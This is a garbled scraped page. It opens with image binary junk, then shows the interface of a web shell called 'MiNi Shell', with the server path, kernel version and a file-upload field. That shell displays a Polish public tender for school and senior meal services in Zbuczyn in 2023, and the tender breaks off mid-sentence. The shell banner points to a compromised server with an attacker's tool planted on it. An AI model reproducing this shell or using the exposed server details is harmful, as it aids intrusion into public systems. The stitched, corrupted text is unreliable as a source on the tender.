JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230113/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230113/0003209101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dożywianie dzieci i osób dorosłych na terenie gminy Zbuczyn w 2023 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gminny Ośrodek Pomocy Społecznej w Zbuczynie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 005183577</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana Pawła II 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zbuczyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-106</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL925 - Siedlecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gops@zbuczyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gopszbuczyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> jednostka organizacyjna gminy </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dożywianie dzieci i osób dorosłych na terenie gminy Zbuczyn w 2023 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-af0c5567-9349-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00032091</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-af0c5567-9349-11ed-b4ea-f64d350121d2 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">zgodnie z SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., zwanym dalej „RODO”) informujemy, że: <br/>1)	administratorem Pani/Pana danych osobowych jest: Kierownik Gminnego Ośrodka Pomocy Społecznej w Zbuczynie, ul. Jana Pawła II 1, 08-106 Zbuczyn, tel. 25 641 63 21, e-mail: gops@zbuczyn.pl,<br/>2)	administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@gopszbuczyn.pl,<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji. <br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P. <br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; <br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego,<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO,<br/>8)	posiada Pani/Pan: <br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących <br/>(w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora <br/>niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania <br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności <br/>podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub <br/>konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie <br/>zamówienia); <br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych <br/>(skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania <br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie <br/>niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego <br/>załączników); <br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania <br/>danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie <br/>zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 <br/>RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do <br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu <br/>ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu <br/>publicznego Unii Europejskiej lub państwa członkowskiego); <br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna <br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy <br/>RODO; <br/>9) nie przysługuje Pani/Panu: <br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, <br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c <br/>RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GOPS.252.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia.<br/>1.	Przedmiotem zamówienia jest dożywianie dzieci i osób dorosłych na terenie gminy Zbuczyn: <br/>1)	Dożywianie dzieci i dorosłych w ramach Programu „Posiłek w szkole i w domu”:<br/>	Szkoła Podstawowa w Zbuczynie - dożywianie dla 20 uczniów - 1 600 posiłków.<br/>	Szkoła Podstawowa w Krzesku - Królowa Niwa - dożywianie dla 38 uczniów – 4 400 posiłków.<br/>	Niepubliczna Szkoła Podstawowa w Borkach Wyrkach, Niepubliczne Przedszkole w Borkach Wyrkach - dożywianie dla 10 uczniów – 1 600 posiłków.<br/>	Niepubliczna Szkoła Podstawowa w Ługach Wielkich, Niepubliczne Przedszkole w Ługach Wielkich - dożywianie dla 15 uczniów – 2 400 posiłków.<br/>	Szkoła Podstawowa w Czuryłach, Niepubliczne Przedszkole w Cielemęcu 10 uczniów – 1 600 posiłków.<br/>	Niepubliczna Szkoła Podstawowa, Niepubliczne Przedszkole w Izdebkach – Kosnach - dożywianie dla 20 uczniów – 3 200 posiłków.<br/>	Szkoła Podstawowa w Dziewulach, Niepubliczne Przedszkole w Dziewulach - dożywianie dla 20 uczniów – 3 000 posiłków.<br/>	Szkoła Podstawowa w Borkach Kosach, Niepubliczne Przedszkole w Borkach Kosach - dożywianie dla 10 uczniów – 1 600 posiłków,<br/>	osób dorosłych – dożywiania 5 osób – 600 posiłków <br/>2)	Dożywianie uczestników Dziennego Domu Senior+ w Zbuczynie - dożywianie dla 17 osób – 3 600 posiłków<br/>Liczba osób – 165 <br/>Liczba posiłków – 23 600<br/><br/>Pozostałe dane dotyczące przedmiotu zamówienia:<br/>1)	Zamawiający zastrzega sobie prawo zmiany w trakcie realizacji zamówienia liczby osób dożywianych tj. zmniejszenie jak i zwiększenie ilości osób, pod warunkiem że ogólna wartość umowy nie ulegnie zwiększeniu. Wykonawca otrzymuje od Zamawiającego listę osób objętych dożywianiem, która zawiera następujące dane: imię i nazwisko osoby, adres zamieszkania, a w przypadków uczniów również klasa.<br/>2)	Zamawiający w trakcie trwania zamówienia będzie na bieżąco przekazywał Wykonawcy w formie pisemnej/telefonicznej lub e-mail zmiany dotyczące osób korzystających z dożywiania tj. zgłoszenie nowej osoby do dożywiania lub rezygnacja osoby z dożywiania.<br/>3)	Dożywienie osób, o których mowa w części II. 1 ust. 1 pkt. 1 niniejszego rozdziału odbywać się będzie od poniedziałku do piątku w dni nauki szkolnej z uwzględnieniem przerw w nauce (ferie, wakacje, przerwy świąteczne itp.).<br/>Dożywienie osób, o których mowa w części II. 1 ust. 1 pkt. 2 niniejszego rozdziału odbywać się będzie od poniedziałku do piątku w dni robocze w wyłączeniem dni ustawowo wolnych od pracy.<br/>4)	Zamawiający zastrzega sobie prawo, iż ponosi opłatę za faktycznie wydane posiłki dla poszczególnych osób wg przekazanych przez Zamawiającego list osób objętych dożywianiem. Wykonawca powinien ująć w cenie, ryzyko związane z nieobecnością uczniów w szkole i osób w Dziennym Domu Senior+.<br/>5)	Wykonawca zobowiązany jest do przedłożenia Zamawiającemu faktury wraz z listą osób korzystających z dożywiania, która zawiera następujące dane: imię i nazwisko, adres zamieszkania a w przypadku uczniów imię rodzica, klasa oraz liczba wydanych posiłków. Lista powinna być potwierdzona przez Dyrektora danej szkoły w przypadku Dziennego Domu Senior+ przez Kierownika Domu.<br/><br/>Obowiązki Wykonawcy:<br/>1.	Zakres przedmiotu zamówienia obejmuje:<br/>1)	sporządzanie posiłku &#34;od surowca do gotowego wyrobu&#34;, <br/>2)	dostarczanie do miejsca docelowego posiłków pojazdem posiadającym odpowiednie zezwolenia właściwego inspektora sanitarnego do przewozu żywności w hermetycznie zamykanych termosach izotermicznych,<br/>3)	wydawanie posiłków:<br/>- w przypadku osób, o których mowa części II. 1 ust. 1 pkt. 1 niniejszego rozdziału należy rozumieć jako rozdysponowanie ich na poszczególne osoby na zestawach obiadowych znajdujących się w każdej ze szkół, zmycie naczyń, wyparzenie ich i przygotowanie ich do użytku na następny dzień,<br/>- w przypadku osób, o których mowa w części II. 1 ust. 1 pkt. 2 niniejszego rozdziału należy rozumieć jako dostarczenie ich w jednorazowych pojemnikach do siedziby Dziennego Domu Senior+. <br/>2.	Szczegółowe wymagania dotyczące posiłków:<br/>1)	Każdy posiłek będzie się składał z dwóch ciepłych dań tj. pierwsze i drugie danie oraz deseru.<br/>Pierwsze danie - zupy: kalafiorowa; ogórkowa; jarzynowa; koperkowa; pomidorowa z ryżem i makaronem; pieczarkowa; krupnik; barszcz ukraiński; rosół z makaronem; fasolowa; kapuśniak; warzywna.<br/>Drugie danie - m.in. gulasz z kaszą jęczmienną, pyzy z mięsem i soczewicą, pulpet w sosie pomidorowym z ziemniakami, kotlet drobiowy z ryżem, ryba z ziemniakami, sos z mięsa mielonego z makaronem, kotlet schabowy z ziemniakami, bigos z ziemniakami, kotlet pożarski z ziemniakami, pierogi z kapustą i grzybami, gołąbki w sosie pomidorowym z ziemniakami, kurczak pieczony z ryżem, gulasz pomidorowy z ryżem, kotlet mielony z pieca z ziemniakami, pierogi z mięsem, kotlet z piersi kurczaka z ziemniakami, pierogi z białym serem i jogurtem, kluski śląskie z sosem pieczarkowy,<br/>Surówki - m.in. buraczki; surówka warzywna, marchewka z chrzanem, surówka z białej kapusty, pora, czerwonej kapusty, selera; ogórek kwaszony; marchewka z groszkiem; surówka z kiszonej kapusty, <br/>Deser - kompot z owoców; <br/>Owoce - nie rzadziej niż 2 razy w tygodniu.<br/>2)	Posiłek nie może występować częściej w jadłospisie niż jeden raz w tygodniu i nie rzadziej niż raz w miesiącu.<br/>3)	Posiłki muszą spełniać normy żywieniowe obowiązujące dla określonej grupy wiekowej - dzieci w wieku przedszkolnym, szkoły podstawowej i osoby dorosłe. Należy mieć na uwadze odpowiedni dobór wartości odżywczych i zapotrzebowanie energetyczne dla tej grupy wiekowej.<br/>4)	Gramatura obiadów powinna odpowiadać normom żywieniowym oraz powinna być <br/>dopasowana do wieku uczniów. <br/>5)	Posiłki mają być sporządzone zgodnie z przepisami i wymaganiami sztuki kulinarnej oraz <br/>sanitarnej dla żywienia zbiorowego a także zgodnie z zalecanym modułem żywienia <br/>o charakterze prozdrowotnym, w tym m.in. poprzez duży udział warzyw w każdym posiłku. <br/>6)	Posiłki powinny posiadać odpowiednie walory smakowe i zapachowe oraz estetyczny <br/>wygląd, powinny być przyrządzone z uwzględnieniem norm żywieniowych o wysokiej <br/>wartości odżywczej. <br/>7)	Posiłki muszą być sporządzone w dniu dostawy i dostarczone do szkół własnym <br/>transportem w specjalistycznych pojemnikach w godzinach uzgodnionych z Dyrektorem <br/>szkoły. W przypadku dostarczania gorących posiłków muszą one mieć odpowiednią <br/>temperaturę, wymaganą dla posiłków obiadowych.<br/>8)	Posiłki muszą być przygotowane zgodnie z wymogami określonymi w ustawie z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywości i żywienia (Dz. U. z 2022 r. poz. 2132 z późn. zm.) oraz Rozporządzeniem Ministra Zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach (Dz. U. z 2016 r. poz. 1154).<br/>9)	Posiłki muszą być wykonane ze świeżych artykułów spożywczych posiadających aktualne terminy ważności. Produkcja, przechowywanie, dostarczanie i wydawanie powinno odbywać się z zachowaniem odpowiednich warunków higieniczno - sanitarnych.<br/>10)	Zamawiający zastrzega aby wyroby mięsne nie były podawane w dni postne.<br/>11)	Zamawiający nie dopuszcza aby w ciągu jednego tygodnia (5 dni) wystąpiła powtarzalność tego samego rodzaju posiłku. Przez posiłek rozumie się pierwsze i drugie danie.<br/>12)	Posiłki powinny być dostarczane do każdej z placówek w godz. 10.00-13.00 własnym transportem w hermetycznie zamykanych termosach izotermicznych. Wykonawca w ww. godzinach zapewnia możliwość pobrania posiłku w każdej z placówek.<br/>13)	Dostawca każdorazowo, z tygodniowym wyprzedzeniem, przedłoży dyrektorom poszczególnych szkół, oraz kierownikowi Dziennego Domu Senior+ jadłospis na kolejne 2 tygodnie, celem akceptacji. Wykonawca zobowiązany jest do wprowadzania zmian w jadłospisie wprowadzanych przez dyrektorów szkół i kierownika Dziennego Domu Senior+.<br/>14)	Dodatkowo zamawiający zastrzega w związku z faktem występowania pandemii <br/>COVID – 19, że w przypadku zawieszenia nauki w szkołach będzie na bieżąco informował <br/>Wykonawcę o realizacji (wstrzymaniu, uruchomieniu oraz innych ewentualnościach) <br/>zamówienia. <br/>15)	Zamawiający zastrzega sobie prawo do okresowego przeprowadzania kontroli <br/>należytego wykonania przedmiotu umowy przez Wykonawcę oraz przestrzegania <br/>obowiązujących przepisów higieniczno - sanitarnych, jak też innych wymogów, <br/>w szczególności w zakresie świeżości potraw i terminu przydatności do spożycia oraz <br/>estetyki podawania posiłków. Zgłoszone przez Zamawiającego zastrzeżenia winny być <br/>uwzględnione niezwłocznie przez Wykonawcę. Jeżeli Wykonawca wykonuje przedmiot <br/>umowy w sposób wadliwy albo sprzeczny z umową, Zamawiający może wezwać go do <br/>usunięcia nieprawidłowości i wyznaczyć mu w tym celu odpowiedni termin. Po <br/>bezskutecznym upływie wyznaczonego terminu, Zamawiający może wypowiedzieć umowę <br/>z winy Wykonawcy. <br/>16)	Dodatkowo zamawiający zastrzega w związku z faktem występowania pandemii COVID – 19, że w przypadku zawieszenia nauki w szkołach będzie na bieżąco informował Wykonawcę <br/>o realizacji (wstrzymaniu, uruchomieniu oraz innych ewentualnościach) zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55523100-3 - Usługi w zakresie posiłków szkolnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <p class="mb-0">55521200-0 - Usługi dowożenia posiłków</p> <p class="mb-0">55524000-9 - Usługi dostarczania posiłków do szkół</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-02-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów: <br/>Lp.	Nazwa kryterium	Znaczenie kryterium<br/>1	Cena	60%<br/>2	Odległość dowożenia	40%<br/><br/>Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej. <br/><br/>Kryterium – „Cena” <br/>Kryterium – „Cena” będzie oceniane na podstawie ceny brutto przedmiotu zamówienia zawartej w ofercie, a ilość punktów obliczana będzie według poniższego wzoru: <br/> Cnaj<br/>C = WP x ------------------ <br/> Cof<br/>gdzie: <br/>C – liczba punktów przyznanych ocenianej ofercie w kryterium „Cena” <br/>WP – waga dla kryterium „Cena” <br/>Cnaj – najniższa cena brutto zaoferowana w przetargu - dzielna <br/>Cof – cena brutto zawarta w ocenianej ofercie - dzielnik <br/><br/>Odległość dowożenia – długość trasy w km do placówki oświatowej położonej najdalej od miejsca przygotowywania posiłków. Ocena wg wzoru matematycznego:<br/><br/> Dnaj<br/>D = ------------------ x 40<br/> Dof<br/><br/>Dnaj – odległość dowożenia najkrótsza<br/>Dof – odległość dowożenia oferty badanej<br/><br/>Kryterium odległość dowożenia wprowadzone zostało z uwagi na dbałość zamawiającego o to, aby dostarczane posiłki były świeże i docierały do dzieci i dorosłych jak najszybciej po ugotowaniu. Odległości przyjęte zostaną przy założeniu poruszania się najkrótszą możliwą drogą, a Wykonawca w celu obliczenia tych odległości użyje portalu http://www.targeo.pl/.<br/><br/>Sposób oceny ofert <br/>1.	Oferta, która otrzyma największą, łączną ilość punktów uznana zostanie za najkorzystniejszą.<br/>Ocena ogólna poszczególnych ofert dokonywana będzie w oparciu o poniższą formułę: S = C + R gdzie: <br/>S – oznacza łączną oceną jako sumę punktów w poszczególnych kryteriach <br/>C – liczba punktów uzyskanych w kryterium „Cena” <br/>R – liczba punktów uzyskanych w kryterium „Odległość” <br/>2. Oferta wypełniająca w najwyższym stopniu wymagania określone w każdym kryterium otrzyma maksymalną liczbę punktów. Pozostałym Wykonawcom, wypełniającym wymagania kryterialne, <br/>przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów. Wynik będzie traktowany jako wartość punktowa oferty; <br/>3. Wynik: oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów <br/>w oparciu o ustalone kryteria), zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną <br/>sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona <br/>Wykonawcy, którego oferta uzyska najwyższą ilość punktów; <br/>4. Jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku <br/>podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny <br/>takiej oferty doliczy do przedstawionej w niej ceny podatek od towarów i usług, który miałby <br/>obowiązek rozliczyć 